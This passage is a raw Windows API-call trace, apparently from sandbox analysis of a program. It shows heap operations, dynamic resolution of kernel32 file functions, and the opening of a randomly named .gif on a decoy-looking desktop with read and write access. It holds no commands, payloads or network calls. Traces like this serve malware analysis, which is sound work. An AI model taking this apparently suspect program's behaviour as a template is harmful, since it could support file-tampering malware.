Size=0x4) returned 0x7af5e8 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.891] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8e0 [0031.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.892] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0031.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.892] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0031.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0031.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0031.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpUsedDefaultChar=0x0) returned 72 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.893] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\v6hoz9ycop.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=72, lpWideCharStr=0x7c3818, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif") returned 72 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.895] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.897] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.897] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.898] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.898] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0031.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.899] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.899] HeapFree (in: 